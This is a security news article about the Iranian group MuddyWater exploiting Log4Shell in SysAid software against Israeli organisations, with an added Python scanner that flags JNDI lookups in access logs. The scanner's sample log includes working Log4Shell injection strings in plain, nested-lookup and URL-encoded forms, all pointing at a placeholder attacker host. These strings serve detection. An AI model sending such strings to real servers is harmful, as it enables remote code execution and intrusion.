Microsoft: Iranian hackers still exploiting Log4j bugs against Israel
Hackers continue to exploit the Log4j vulnerability in vulnerable applications, as shown by the Iranian 'MuddyWater' threat actor who was found targeting Israeli organizations using the SysAid software.
The latest MuddyWater hacking campaign outlined in a Microsoft report yesterday constitutes the first example of leveraging vulnerable SysAid applications to breach corporate networks.
MuddyWater previously targeted VMware instances that carried Log4j flaws to drop web shells, but assuming that these were eventually patched, the threat actors explored alternative options.
The Iranian hackers exploit Log4Shell flaws for initial access, running malicious PowerShell via a specially crafted request sent to vulnerable endpoints and dropping web shells.
Ligolo is an open-source reverse-tunneling tool that the hackers use for securing communications between backdoors and C2 infrastructure.
While Microsoft's report doesn't go into the details of the particular tool, we know from a March 2022 report by Security Joes that the hackers added useful features like execution checks and command-line parameters.
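The initial-access step described above relies on a crafted request that carries a Log4j lookup string. As an added detection example (not code from the Microsoft or Security Joes reports, and unrelated to SysAid's own software), the scanner below URL-decodes each access-log line, collapses the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that Log4j 2 itself would resolve, and then flags any line that contains a `${jndi:...}` lookup. The log lines, client addresses and request paths are constructed for illustration.

```python
"""Scan HTTP access-log lines for Log4Shell (CVE-2021-44228) JNDI lookup strings.

Added detection example. The sample log lines below are constructed for
illustration and are not taken from any report or real server.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further ${ or } inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation; group 1 is the protocol (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample: line 1 and line 5 are benign, lines 2-4 carry lookups
# (plain, nested-lookup and URL-encoded forms). Hosts and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Aug/2022:12:00:01 +0000] "GET /helpdesk/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Aug/2022:12:00:07 +0000] "GET /helpdesk/login?u=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.9 - - [10/Aug/2022:12:00:09 +0000] "GET /helpdesk/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.10:1099/b}"
10.0.0.9 - - [10/Aug/2022:12:00:12 +0000] "GET /helpdesk/login?u=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.10%2Fx%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.7 - - [10/Aug/2022:12:01:00 +0000] "GET /helpdesk/search?q=${name:-guest} HTTP/1.1" 200 30 "-" "Mozilla/5.0"
"""


def _resolve(match):
    """Evaluate one innermost Log4j 2 lookup; unknown lookups are left untouched."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[len("lower:"):].lower()
    if head.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                      # ${name:-default} -> default (name is undefined here)
        return body.split(":-", 1)[1]
    return match.group(0)                 # e.g. ${jndi:...}: keep so the detector can see it


def normalize(text, max_rounds=10):
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan(log_text):
    """Return one finding per log line that contains a JNDI lookup after normalisation."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        hit = _JNDI.search(normalize(line))
        if hit:
            findings.append({
                "line": line_no,
                "client": line.split(" ", 1)[0],   # first field of a common/combined log line
                "protocol": hit.group(1).lower(),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['protocol']} lookup from {finding['client']}")
```

Running it reports lines 2, 3 and 4 and leaves the `${name:-guest}` line alone, because the default-value lookup resolves to plain text. A scanner like this only tells you that attempts arrived; the mitigation is still to upgrade Log4j (and the applications embedding it) to a fixed release, and to treat any host that was exposed while vulnerable as a candidate for web-shell and tunnel hunting.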